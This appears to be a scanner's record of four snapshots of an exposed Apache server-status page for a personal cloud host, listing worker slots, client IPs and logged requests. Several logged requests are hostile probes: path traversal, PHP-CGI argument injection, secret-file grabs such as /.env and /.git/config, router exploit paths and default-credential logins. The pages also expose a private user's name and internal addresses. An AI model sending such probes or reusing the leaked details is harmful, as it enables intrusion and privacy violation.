Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb674f2402
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 07-Oct-2024 21:24:26 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 321 Parent Server MPM Generation: 320 Server uptime: 318 days 14 hours 24 minutes 46 seconds Server load: 0.00 0.00 0.00 Total accesses: 557994 - Total Traffic: 62.1 GB - Total Duration: 79406001 CPU Usage: u1070.6 s1824.01 cu5831.38 cs1630.33 - .0376% CPU load .0203 requests/sec - 2421 B/second - 116.7 kB/request - 142.306 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 22613555no0yes025000 32613556no0yes124000 Sum200 149000 ..................................................______________ _______________W____________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-318-0/0/5674. 0.0016346308860200.00.00106.33 141.98.11.79http/1.1 0-318-0/0/5613. 0.0016346308230560.00.0083.32 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5723. 0.00163463718622710.00.0094.29 64.226.78.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-318-0/0/5635. 0.001634631468539800.00.00101.55 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 0-318-0/0/5716. 0.0016346308747710.00.00105.08 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 0-318-0/0/5767. 0.001634632208777530.00.00123.78 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-318-0/0/5690. 0.001634631998530870.00.0076.03 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 0-318-0/0/5683. 0.00163463858491150.00.0098.84 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-318-0/0/5609. 0.001634631318618920.00.0090.46 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-318-0/0/5708. 0.00163463919061700.00.00173.30 54.78.34.25http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-318-0/0/5688. 0.00163463648517510.00.0079.77 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-318-0/0/5634. 0.001634632318413560.00.0071.55 185.224.128.83http/1.1ravignon.mycloud.paris:443GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-318-0/0/5726. 0.00163463858889670.00.0094.83 54.78.34.25http/1.1 0-318-0/0/5695. 0.00163463608762340.00.0085.17 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-318-0/0/5734. 0.001634631318678440.00.0057.69 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /_all_dbs HTTP/1.1 0-318-0/0/5775. 0.0016346319146050.00.0096.28 141.98.11.79http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5671. 0.0016346328806700.00.00129.74 45.83.64.104http/1.1localhost:80GET / HTTP/1.1 0-318-0/0/5615. 0.001634631188630640.00.00116.88 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5666. 0.001634631148364750.00.0090.17 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-318-0/0/5590. 0.00163463608828880.00.0088.81 45.83.64.104http/1.1 0-318-0/0/5610. 0.0016346308342700.00.0065.19 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5617. 0.001634631058756700.00.0070.64 54.78.34.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-318-0/0/5516. 0.001634632778295990.00.0078.51 45.155.91.30http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-318-0/0/5639. 0.00163463648698440.00.0092.06 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-318-0/0/5634. 0.001634631478741910.00.00116.44 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-318-0/0/8236. 0.0016346309786730.00.001826.31 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-318-0/0/8136. 0.00163463010024240.00.001179.54 64.226.78.121http/1.1 1-318-0/0/7058. 0.001634631369298550.00.001538.98 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /config.json HTTP/1.1 1-318-0/0/7714. 0.0016346349633280.00.001703.06 64.226.78.121http/1.1 1-318-0/0/7096. 0.0016346309783550.00.001290.59 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-318-0/0/9097. 0.00163463679833190.00.001499.44 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-318-0/0/7360. 0.00163463659550340.00.001649.97 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-318-0/0/9551. 0.0016346319680030.00.001823.01 182.180.91.217http/1.1localhost:80GET /info.php HTTP/1.1 1-318-0/0/7585. 0.0016346319475990.00.001350.63 64.226.78.121http/1.1 1-318-0/0/8023. 0.0016346309893350.00.001687.14 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-318-0/0/8096. 0.0016346309348400.00.001955.20 64.226.78.121http/1.1 1-318-0/0/7578. 0.0016346329892770.00.004063.23 57.129.23.166http/1.1 1-318-0/0/7221. 0.001634631829821490.00.002086.64 45.83.64.243http/1.1 1-318-0/0/8973. 0.0016346309514520.00.001621.81 182.180.91.217http/1.1 1-318-0/0/6974. 0.0016346309712890.00.001161.58 182.180.91.217http/1.1 1-318-0/0/7745. 0.0016346319585040.00.001367.12 182.180.91.217http/1.1localhost:80GET /?phpinfo=1 HTTP/1.1 1-318-0/0/7855. 0.0016346319842930.00.001841.19 57.129.23.166http/1.1 1-318-0/0/6874. 0.0016346329380950.00.002004.22 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-318-0/0/7306. 0.0016346309306540.00.002347.40 45.83.64.243http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-318-0/0/6950. 0.00163463112334640.00.001961.25 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-318-0/0/7923. 0.0016346329445510.00.001900.58 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-318-0/0/7008. 0.0016346309729260.00.003153.23 139.59.90.176http/1.1ravignon.mycloud.paris:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-318-0/0/7209. 0.0016346309695350.00.003640.26 85.209.11.234http/1.1localhost:80\x03 1-318-0/0/7153. 0.0016346309814430.00.001234.51 182.180.91.217http/1.1localhost:80POST /.env.development.local HTTP/1.1 1-318-0/0/6979. 0.0016346329441650.00.001606.19 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 2-32026135550/84/2563_ 163.01138003421760.026.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbc11c4013
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 05-Oct-2024 22:30:42 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 319 Parent Server MPM Generation: 318 Server uptime: 316 days 15 hours 31 minutes 3 seconds Server load: 0.00 0.00 0.00 Total accesses: 552114 - Total Traffic: 59.5 GB - Total Duration: 78732490 CPU Usage: u906.92 s1777.95 cu5821.85 cs1626.95 - .037% CPU load .0202 requests/sec - 2336 B/second - 113.0 kB/request - 142.602 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02605134no0yes124000 12605133no0yes025000 Sum200 149000 _______________W__________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31826051340/28/5674_ 3.77210908860200.00.20106.33 167.94.146.58h2ravignon.mycloud.paris:443[0/0] init 0-31826051340/24/5613_ 3.79008230560.00.0883.32 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-31826051340/23/5723_ 4.010718622710.00.1194.29 64.226.78.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31826051340/22/5634_ 3.77133608538340.00.15101.53 167.94.146.58http/1.1 0-31826051340/25/5715_ 3.87118747700.00.14105.07 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31826051340/25/5765_ 3.9319491878773540.00.16123.74 178.215.236.240http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-31826051340/23/5689_ 3.87108528870.00.1276.01 64.226.78.121http/1.1 0-31826051340/29/5682_ 3.7849738490290.00.1998.82 202.180.218.100http/1.1 0-31826051340/34/5608_ 3.7753308617610.00.3290.44 57.129.23.166http/1.1 0-31826051340/23/5706_ 3.964982509059540.00.24173.27 87.120.115.119http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-31826051340/22/5688_ 4.010648517510.00.1479.77 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-31826051340/27/5633_ 3.9453318411240.00.1171.53 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-31826051340/26/5725_ 3.9711438888810.00.1294.82 64.226.78.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31826051340/26/5695_ 4.030608762340.00.1685.17 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-31826051340/21/5733_ 3.77194908677120.00.1157.67 167.94.146.58h2ravignon.mycloud.paris:443[0/0] done 0-31826051341/21/5773W 3.92009146000.00.1696.26 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-31826051340/28/5670_ 4.020608806680.00.12129.73 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-31826051340/21/5615_ 3.6511188630640.00.16116.88 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31826051340/24/5665_ 3.910998363610.00.1290.15 47.254.85.182http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31826051340/28/5590_ 4.020608828880.00.1888.81 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-31826051340/22/5610_ 3.65108342700.00.1265.19 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31826051340/23/5617_ 3.7511058756700.00.1970.64 57.129.23.166http/1.1 0-31826051340/27/5515_ 3.920968293210.00.1978.49 47.251.14.232http/1.1ravignon.mycloud.paris:443GET /Public/home/js/check.js HTTP/1.1 0-31826051340/28/5639_ 4.030648698440.00.1892.06 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-31826051340/25/5633_ 3.93133608740430.00.09116.41 117.219.115.192http/1.1localhost:80GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0 1-31826051330/15/8236_ 3.30109786730.00.041826.31 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31826051330/24/8136_ 3.300010024240.00.051179.54 64.226.78.121http/1.1 1-31826051330/16/7057_ 3.40890029297180.00.031538.97 182.180.91.217http/1.1localhost:80GET /phpinfo.php HTTP/1.1 1-31826051330/28/7714_ 3.40149633280.00.101703.06 64.226.78.121http/1.1 1-31826051330/15/7095_ 3.38889909783550.00.021290.59 182.180.91.217http/1.1 1-31826051330/20/9097_ 3.480679833190.00.071499.44 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-31826051330/20/7359_ 3.30890009549690.00.301649.95 182.180.91.217http/1.1 1-31826051330/14/9551_ 3.40889919680030.00.041823.01 182.180.91.217http/1.1localhost:80GET /info.php HTTP/1.1 1-31826051330/12/7585_ 3.39119475990.00.041350.63 64.226.78.121http/1.1 1-31826051330/19/8023_ 3.39109893350.00.061687.14 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31826051330/22/8096_ 3.30109348400.00.211955.20 64.226.78.121http/1.1 1-31826051330/20/7578_ 3.41864429892770.010.114063.23 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-31826051330/14/7221_ 3.4368521829821490.00.092086.64 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-31826051330/23/8973_ 3.37890009514520.00.101621.81 182.180.91.217http/1.1 1-31826051330/25/6974_ 3.37889909712890.07.671161.58 182.180.91.217http/1.1 1-31826051330/22/7745_ 3.40889919585040.06.071367.12 182.180.91.217http/1.1localhost:80GET /?phpinfo=1 HTTP/1.1 1-31826051330/19/7855_ 3.41876419842930.01.701841.19 93.174.93.12http/1.1localhost:80GET / HTTP/1.0 1-31826051330/14/6873_ 3.39875609380930.03.072004.21 182.180.91.217http/1.1localhost:80GET /.env HTTP/1.1 1-31826051330/18/7305_ 3.39864409306540.02.962347.40 57.129.23.166http/1.1 1-31826051330/17/6949_ 3.396851012334630.03.051961.24 182.180.91.217http/1.1localhost:80POST /.env.save HTTP/1.1 1-31826051330/15/7923_ 3.43133129445510.00.061900.58 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-31826051330/14/7007_ 3.2653309729260.00.053153.23 57.129.23.166http/1.1 1-31826051330/17/7208_ 3.28132609695350.00.073640.26 182.180.91.217http/1.1 1-31826051330/27/7153_ 3.39132609814430.00.121234.51 182.180.91.217http/1.1localhost:80POST /.env.development.local HTTP/1.1 1-31826051330/43/6979_ 3.4453329441650.00.151606.19 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 2-308-0/0/2474. 0.0085863943357500.00.0025.22 54.236.215.155http/1.1 2-308-0/0/23
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbc743be15
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 03-Oct-2024 21:34:34 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 317 Parent Server MPM Generation: 316 Server uptime: 314 days 14 hours 34 minutes 54 seconds Server load: 0.13 0.03 0.01 Total accesses: 549020 - Total Traffic: 59.5 GB - Total Duration: 78293496 CPU Usage: u912.02 s1769.93 cu5790.95 cs1617.55 - .0371% CPU load .0202 requests/sec - 2348 B/second - 113.5 kB/request - 142.606 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02599791no0yes025000 12596621no0yes124000 32596622no0yes025000 Sum300 174000 ________________________________________________W_.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31625997910/3/5621_ 0.330758799310.00.04105.93 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-31625997910/1/5554_ 0.101661218125530.00.0282.99 57.129.23.166http/1.1 0-31625997910/2/5678_ 0.11338564870.00.0193.97 3.226.239.16http/1.1 0-31625997910/2/5590_ 0.23167308439440.00.01101.25 198.235.24.77http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-31625997910/1/5657_ 0.1216731098673180.00.02104.68 198.235.24.77http/1.1 0-31625997910/2/5716_ 0.2671188724520.00.04123.44 159.89.174.87http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31625997910/1/5631_ 0.2941958427090.00.0275.37 159.89.174.87http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31625997910/1/5624_ 0.088481848431820.00.0098.44 205.210.31.162http/1.1 0-31625997910/3/5550_ 0.3311468529530.00.0389.97 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-31625997910/1/5652_ 0.1496008971080.00.00172.03 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-31625997910/1/5636_ 0.0844608393120.00.0079.38 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-31625997910/2/5580_ 0.2544708341270.00.0170.74 47.89.230.62http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 0-31625997910/2/5676_ 0.2396218811090.00.0293.77 46.174.191.30http/1.1localhost:80GET / HTTP/1.0 0-31625997910/1/5647_ 0.197248704460.00.0084.83 159.89.174.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-31625997910/3/5686_ 0.2384808636830.00.0056.19 172.206.142.147http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-31625997910/2/5728_ 0.10719103600.00.0195.96 185.16.39.118http/1.1localhost:80GET / HTTP/1.1 0-31625997910/3/5615_ 0.312718748760.00.03129.42 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-31625997910/1/5558_ 0.292738550420.00.02116.46 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-31625997910/3/5608_ 0.2644608316600.00.0289.77 47.89.230.62http/1.1ravignon.mycloud.paris:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 0-31625997910/0/5532_ 0.0044718758800.00.0088.43 80.66.83.48http/1.1 0-31625997910/3/5563_ 0.2616708271670.00.0264.91 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-31625997910/2/5567_ 0.12038632920.00.0067.35 80.82.77.202http/1.1localhost:80\x16\x03\x02\x01o\x01 0-31625997910/2/5463_ 0.22048208100.00.0075.52 95.214.55.43http/1.1localhost:80GET / HTTP/1.1 0-31625997910/0/5587_ 0.00138638990.00.0091.72 3.226.239.16http/1.1 0-31625997910/1/5583_ 0.3111488646490.00.02113.22 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-31625966210/69/8166_ 12.3651329704480.00.531825.96 159.89.174.87http/1.1 1-31625966210/54/8057_ 12.3358399916770.00.421179.15 159.89.174.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31625966210/45/6996_ 12.3166689234150.00.331538.64 159.89.174.87http/1.1 1-31625966210/42/7638_ 12.32419613119559870.00.311702.64 194.140.197.94http/1.1ravignon.mycloud.paris:443GET /prod;/actuator;/env HTTP/1.1 1-31625966210/57/7021_ 12.3337814629672290.00.441290.02 47.89.230.62http/1.1 1-31625966210/44/9024_ 12.371090519715750.00.301498.98 89.248.168.227http/1.1localhost:80GET / HTTP/1.1 1-31625966210/51/7291_ 12.33109054729489670.00.291648.19 89.248.168.227http/1.1 1-31625966210/50/9484_ 12.36009604080.00.381822.69 167.94.145.96http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-31625966210/54/7521_ 12.39323509372070.00.341350.20 8.220.201.94http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-31625966210/48/7946_ 12.3499545469777800.00.321686.29 194.140.197.94http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31625966210/53/8016_ 12.38420129193750.00.341954.61 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-31625966210/51/7510_ 12.3346929785720.02.684052.79 159.89.174.87http/1.1 1-31625966210/54/7154_ 12.361095919665000.00.352086.26 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 1-31625966210/58/8898_ 12.331095914399418950.00.461621.38 57.129.23.166http/1.1 1-31625966210/58/6905_ 12.36519597010.00.391153.57 159.89.174.87http/1.1 1-31625966210/48/7671_ 12.473689493300.00.341359.58 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-31625966210/55/7785_ 12.402657589730840.00.351839.09 103.207.36.74http/1.1localhost:80POST / HTTP/1.1 1-31625966210/58/6805_ 12.3326574539226260.00.382000.83 103.207.36.74http/1.1 1-31625966210/52/7236_ 12.32613839201400.00.352344.08 159.89.174.87http/1.1 1-31625966210/50/6890_ 12.33323561912245600.00.351957.95 194.140.197.94http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31625966210/45/7853_ 12.33135478369341740.00.321899.58 194.140.197.94http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31625966210/51/6940_ 12.37995449659040.00.353152.22 143.244.152.43http/1.1localhost:80GET / HTTP/1.1 1-31625966210/43/7136_ 12.3241966099606610.00.293639.85 194.140.197.94http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31625966211/50/7072W 12.33009721550.00.351234.00 159.89.174.87http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-31625966210/57/6897_ 12.35609388470.01.411604.30 159.89.174.87h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 2-308-0/0/2474. 0.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb88117801
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Tuesday, 01-Oct-2024 22:21:49 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 315 Parent Server MPM Generation: 314 Server uptime: 312 days 15 hours 22 minutes 10 seconds Server load: 0.00 0.00 0.00 Total accesses: 544535 - Total Traffic: 59.4 GB - Total Duration: 77372333 CPU Usage: u905.06 s1758.21 cu5760.12 cs1608.08 - .0371% CPU load .0202 requests/sec - 2361 B/second - 114.4 kB/request - 142.089 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12588120no0yes025000 32588121no0yes124000 Sum200 149000 ........................._________________________.............. ...........________________________W............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.0051250618797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.0051250618124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.005125061278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.0051250608439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.005125062428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.005125062208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.005125061318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.005125061848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.005125061338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.005125061448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.0051250618393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.005125062698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.0051250618811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.005125062278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.0051250658636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.0051250609103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.0051250618748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.0051250608549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.005125061448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.0051250618758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.0051250618268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.0051250638632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.0051250618208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.0051250638638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.005125061658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-31425881200/31/8061_ 7.47452609464600.00.151825.18 185.224.128.67http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-31425881200/34/7969_ 7.46801109731020.00.221178.48 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-31425881200/33/6919_ 7.47484419053740.00.201538.10 45.148.10.242http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-31425881200/35/7564_ 7.4413647909404580.00.221702.11 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-31425881200/29/6931_ 7.26102761029466070.00.161289.35 81.209.179.155h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31425881200/28/8946_ 7.2513647819567440.00.151498.45 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31425881200/34/7198_ 7.36125571519317020.00.231647.60 57.129.23.166http/1.1 1-31425881200/28/9405_ 7.36133571299439400.00.171822.13 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31425881200/32/7426_ 7.2610273699183360.00.181349.62 81.209.179.155http/1.1 1-31425881200/30/7861_ 7.108011839581000.00.191685.73 57.129.23.166http/1.1 1-31425881200/31/7939_ 7.2748441389011920.00.171954.10 45.148.10.242http/1.1 1-31425881200/39/7422_ 7.4841711169590040.00.284049.88 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-31425881200/25/7063_ 6.7121039477370.00.172085.70 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31425881200/29/8808_ 7.231849227010.00.201620.69 157.230.19.140http/1.1 1-31425881200/31/6808_ 7.451255709371650.00.181152.93 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-31425881200/31/7583_ 7.07165991629232490.00.201358.94 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31425881200/28/7700_ 7.39229571430.00.151838.55 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31425881200/32/6713_ 7.4111319033710.00.202000.23 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31425881200/39/7150_ 7.441336209021010.00.262343.51 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-31425881200/36/6805_ 7.55015212054190.00.211957.40 157.230.19.140http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-31425881200/30/7779_ 7.38452129177260.00.161898.73 141.98.11.15http/1.1localhost:80GET / HTTP/1.1 1-31425881200/33/6861_ 7.3016589470590.00.213151.68 157.230.19.140h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31425881200/34/7061_ 7.2941711839458040.00.183639.37 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31425881200/31/6989_ 7.3201439508340.00.171233.44 57.129.23.166http/1.1 1-31425881200/29/6799_ 7.5601699229810
Severity: medium
